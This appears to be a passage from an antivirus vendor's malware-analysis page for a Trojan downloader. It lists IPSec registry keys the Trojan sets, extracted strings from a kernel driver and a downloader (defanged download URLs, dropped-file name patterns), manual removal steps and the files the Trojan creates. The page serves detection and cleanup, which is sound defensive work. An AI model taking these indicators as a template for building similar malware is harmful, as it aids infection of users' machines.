"name"="ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecID"="{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}]
"name"="ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecID"="{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecISAKMPReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"

%original file name%.exe_1696_rwx_00EA1000_00004000:

.text
h.rdata
H.data
.reloc
**************** Modified with PEditor 1.7 by yoda & M.o.D. -> come.to/f2f ****************
D:\DirectDiskForWin32\KillProcess\objfre_wxp_x86\i386\pcidump.pdb
ntoskrnl.exe
HAL.dll
\??\c:\%original file name%.exe
\??\%WinDir%\Explorer.EXE
ers\gm.dls
\drivers\gm.dls
\drivers\pcidump.sys
GetWindowsDirectoryA
KERNEL32.dll
ADVAPI32.dll
khy.dll
\DosDevices\Scsi%d:

cc2178718.exe_744:

.text
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh
YYSSSSh
WinExec
KERNEL32.dll
USER32.dll
RegCloseKey
RegCreateKeyA
ADVAPI32.dll
InternetOpenUrlA
HttpQueryInfoA
DeleteUrlCacheEntry
WININET.dll
MSVCP60.dll
ShellExecuteA
SHELL32.dll
MSVCRT.dll

cc2178718.exe_744_rwx_00400000_00001000:

.text
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh

svchost.exe_1236:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    sc.exe:612
    sc.exe:1572
    sc.exe:1776
    OneG2190828.exe:1548
    runonce.exe:340

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\cc2178718.exe (16 bytes)
    %System%\wbem\Logs (4 bytes)
    %WinDir%\inf\oem10.inf (4 bytes)
    %WinDir%\5717.mp4 (58 bytes)
    %WinDir%\Temp\Perflib_Perfdata_7a8.dat (4 bytes)
    %Documents and Settings%\All Users (4 bytes)
    C:\$Directory (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5 (4 bytes)
    %System%\jsseting.data (16 bytes)
    %System%\config\SysEvent.Evt (168 bytes)
    %Program Files%\RAV\CCtest.inf (4 bytes)
    C:\PROGRAM FILES (96 bytes)
    %Program Files%\RAV\CCtest.sys (7 bytes)
    %System%\drivers\pcidump.sys (11 bytes)
    %WinDir%\inf\oem10.PNF (18746 bytes)
    %Program Files%\RAV\CCtest.dll (10 bytes)
    %WinDir%\setupapi.log (32472 bytes)
    %System%\drivers\SET41.tmp (7 bytes)
    %Documents and Settings%\%current user%\Cookies (96 bytes)
    %System%\Rwmltcy.cc3 (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (5572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\OneG2190828.exe (11028 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now